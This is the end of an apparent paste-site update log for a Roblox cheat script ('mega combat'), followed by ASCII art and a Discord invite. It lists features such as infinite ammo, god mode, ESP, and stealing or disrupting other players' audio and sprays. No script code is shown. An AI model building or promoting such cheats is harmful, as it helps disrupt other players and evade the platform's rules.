  4970. - Added Remote control flying uzi
  4971. - Added Shoot everyone around you
  4972. - Switched to Mouse.KeyDown (Exploit should work for free exploit users now)
  4973. - Fixed bugs
  4974. - Improved infinite ammo uzi
  4975. - Reduced lag build up from rapid fire (or at least attempted to)
  4976. - Added ESP to trace Uzis, Shotties, and Cash spawned around the map
  4977. ==========6/7/2019==========
  4978. - Added Anti-Knockdown, so you'll never be stunned or tripped again
  4979. - Added fly on the H key. You can shoot while flying
  4980. - You can now change the radius of the Q Key with :setrad NUMBER
  4981. - Added esp commands, for finding people easier.
  4982. - Added my floating planks script in the form of chat commands (:plank and :unplank)
  4983. ==========6/8/2019==========
  4984. - Fixed :find
  4985. - Added whitelisting, to avoid shooting your friends (:wl and :unwl)
  4986. - Added :planksurf, so you can use planks as a platform
  4987. ==========6/11/2019==========
  4988. - Seats are now automatically removed when you inject. You can bring them back by saying :reseat
  4989. - You can't shoot people in your whitelist at all anymore. Horray for friendship!
  4990. - I probably added more stuff but I can't remember. Horray for memory loss!
  4991. - Made it easier to identify me in-game
  4992. ==========6/17/2019==========
  4993. - Added the ability to drop tools with the \ key
  4994. - Added the ability to hide your equipped gun with :hidegun (doesn't work with the glock)
  4995. - Added :rmesh / :demesh which removes the mesh of any boombox or spraypaint you're holding.
  4996. - Blacklisted anyone with la_ in their name because someone named La_Nicole pissed me off LOL
  4997. - (if have la_ in your name, and can find the part I added for banning you, you can use the script :triumph:)
  4998. ==========6/27/2019==========
  4999. - Pressing G will make you do /e kick (Only if you have the animations gamepass)
  5000. - Fixed the problem with people not seeing my chat LOL
  5001. - Added :freeshoot and :unfreeshoot lets you shoot while walking and jumping (defaults to on)
  5002. - Added the ability to run on the telephone wires! (defaults to on) you can toggle this with :togglewirerun
  5003. ==========7/1/2019==========
  5004. - Pride month is over :OOO
  5005. - Added god mode, which I'm pretty sure is originally from gideon. So credits to loqt
  5006. - You can turn on godmode with :god or :godmode and you turn it off with :ungod or :ungodmode
  5007. - You can now remove your face with :rface or :faceless
  5008. - You can now remove your legs with :rlegs
  5009. - Added :stealthshotty and :stealthuzi
  5010. - Fixed animations getting stuck after flying
  5011. - Added :spray PLAYERNAME for stealing people's spray IDs (:stealspray also works)
  5012. - Added :unfind so you can unfind people that you traced with the :find command
  5013. ==========7/2/2019==========
  5014. - Added :eboombox which injects Enhanced Boombox.
  5015. - Once enhanced boombox is injected, you can play other people's audios by typing their names in the boombox GUI then pressing play
  5016. - Enhanced boombox will also automatically convert your asset ids to version ids (basically semi-encryption)
  5017. -
  5018. - Added :song PLAYERNAME for stealing people's songs (:stealsong also works)
  5019. -
  5020. - INFINITE AMMO GOT PATCH LMFAO
  5021. - REMOVED EVERYTHING INFINITE AMMO RELATED (R key, F key, C key, Z key)
  5022. - Removed :wl and :god since both are patched (:wl has no use now that infinite uzi is patched)
  5023. ==========7/4/2019==========
  5024. - Some people are saying godmode isn't patched, I'll add that back later
  5025. - Added :eplay and :erplay (Encrypted play, and Encrypted Regular play)
  5026. - :eplay plays your audios on your character with encryption
  5027. - :erplay plays your audios on your radio with encryption
  5028. ==========7/5/2019==========
  5029. - Added donator role
  5030. - If you donate to the script, you'll get a green name on the leaderboard for other people using the script
  5031. - Re-Added godmode
  5032. - Added the :donate command, which brings up a gui with a list of donation options.
  5033. - Changed the initial donation prompt upon injection of the script
  5034. ==========7/6/2019==========
  5035. - 3 day update streak, let's go boys
  5036. - Added :visualize TOOLNAME
  5037. - Saying ":visualize hat" will do a hat visualizer.
  5038. - Shoutout to hellish, since the visualizer in this script is based off of theirs
  5039. - Added unvisualize to stop your visualizer
  5040. - Reworked :demesh and :rmesh to work better with the visualizer
  5041. ==========7/7/2019==========
  5042. - Added the option to kill yourself with the M key (You need either a glock or a shotty)
  5043. ==========7/8/2019==========
  5044. - Added ":clickspam" and ":unclickspam"
  5045. - :clickspam mass spams the out of ammo noise everywhere (overpowers audios)
  5046. ==========7/9/2019==========
  5047. - Added antivoid (stops people from flinging you automatically) starts working as soon as you run the script
  5048. - Added :stopmusic to stop everyone else's music
  5049. - Added :fix to fix your music after it's been broken by yours, or someone else's :clickspam / :stopmusic
  5050. ==========7/10/2019==========
  5051. - Added something to keep track of how many players use mega combat a day
  5052. ==========7/11/2019==========
  5053. - Added automatic error reports. If you're kicked or banned while using mega combat, I'll know now.
  5054. - Improved antivoid to not error.
  5055. - Fixed bugs on the error reporter
  5056. - Added :rejoin command
  5057. - Fixed mega combat not auto-executing after rejoining with :rejoin or :tostreets command (When in auto-exe folder)
  5058. - Added :tostreets and :toprison to the commands list, since I finally got around to testing if they're safe
  5059. - Added a void toggle on the V key
  5060. - Also added a :void command, which works similarly.
  5061. - Added :disc and :discord commands, which shows a gui with the discord invite, and button for copying it
  5062. - Added Nitro Booster role, nitro boosters will now be shown in purple on the leaderboard
  5063. - Error handler no longer errors due to disconnections from being idle
  5064. - Added (BROKEN) to the title of the notification asking to donate. Due to synapse blocking marketplace functions.
  5065. - Added notification asking users of the script to join the discord :triumph:
  5066. - Added :reset for reseting without killing your character. (More intense of a reset than what's on the P key)
  5067. ==========7/13/2019==========
  5068. - Broke the update streak by missing the 12th :(
  5069. - Added :autoreset which turns on autoreset (When autoreset is on, you'll be reset as soon as you get ragdolled)
  5070. - Added :unautoreset which turns off autoreset
  5071. - Fixed :reset kicking you if you do it while ragdolled.
  5072. - Added :breakneck for snapping your own neck
  5073. - Fixed autoreset since I pushed the update without fully testing it
  5074. ==========7/17/2019==========
  5075. - Added :dupeboom for getting multiple boomboxes while in god mode
  5076. - Added :bringboom and :boombring for bringing all dropped boomboxes
  5077. - Added :emplay SONGID and :mplay SONGID which mass plays boomboxes (requires more than one + godmode)
  5078. - :emplay SONGID and :mplay SONGID are louder than normal, and unmutable XDXDXDXDXD
  5079. - :mplay stands for mass play, and :emplay stands for encrypted mass play
  5080. ==========7/18/2019==========
  5081. - Added a cool hitlist type beat
  5082. ==========7/21/2019==========
  5083. - Vastly improved the visualizer
  5084. - You can now use multiple sets of tools with the visualizer.
  5085. (For example, saying ":visualize glock knife pipe" will visualize the glock, knife, and pipe)
  5086. - Added different visualizing styles. Saying :visualize2 TOOLNAME will visualize the tool with the second style
  5087. (There's only 4 styles for now)
  5088. - Also added :vismode NUMBER to switch between visualizing modes.
  5089. (If you enter a number that doesn't exist, it'll default to 1)
  5090. - Turned :freeshoot into two different commands. :walkshoot and :jumpshoot (also :unwalkshoot and :unjumpshoot)
  5091. (:walkshoot will let you shoot while walking, and :jumpshoot will let you shoot while jumping)
  5092. - Added 2 more shitty visualizer styles, for a total of 6
  5093. - Made it so you can do :visualize hats instead of just :visualize hat now
  5094. - Made :visualize and related commands easier to use and less buggy
  5095. ==========7/22/2019==========
  5096. - Removed the blacklist on people La_ in their name
  5097. ==========7/23/2019==========
  5098. - Made a cool combat roll that activates when you press R
  5099. - Made the cool combat roll better, and not deactivate when you hit and stuff
  5100. - Made :clickspam and :stopmusic much better
  5101. ==========7/26/2019==========
  5102. - Added the ":unmutable" command, which makes your boombox unmutable! (Resets you once) (Takes around 10 seconds total)
  5103. ==========7/27/2019==========
  5104. - Added a big house for cool exploiters
  5105. --]]
  5106.  
  5107. --[[
  5108. ..
  5109. /yys. `hMM/
  5110. :ys: `NMMMo oMMM:
  5111. `sMMMm -oo: `NMMy
  5112. .hMMMMM+ +MMN` `.-::. `
  5113. -mMMyoMMN. /hho .:syhhomMMs -smNMMMNy `shysssssyhdho
  5114. :mMMs``dMMd` NMMm .smMNdhdMMMM. `sNMNs:/MMM. `ydmmmmddMMMN+
  5115. +NMMs -MMMs :MMM/ +NMNs- .MMMy .dMMd- -yMMy `````/hMMy-
  5116. `yMMMmosyhdMMMM+ yMMm yMMN: `yMMM/ dMMN+odNMd/ :hMNy:
  5117. -dMMMMMMmmdhyhMMM+ NMMo /MMM- :dMMMM- :MMMMNmho-``:/ :hNMh-
  5118. +NMMm//-..`` `hMMMo` -MMM/ yMMm``:hNMyMMM+.-- :MMMy.` `-omMd` /dMMmo/+oooo/`
  5119. oMMMh. `yMMMm/ :MMMs +MMMmmMNh: hMMNNNy yMMMmhdmNMm+`:dMMMMNNNNmNMMMo
  5120. :yh+` `/dNNs `ydh: :shys/. `+yso-` :shddhy+-` oNMNho:-..```.-/`
  5121.  
  5122. Join my discord here!:
  5123. https://discord.gg/4FCbEbZ
  5124.  
  5125. Scroll to above the Aidez stamp to see the update log
  5126.  
  5127. --]]
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement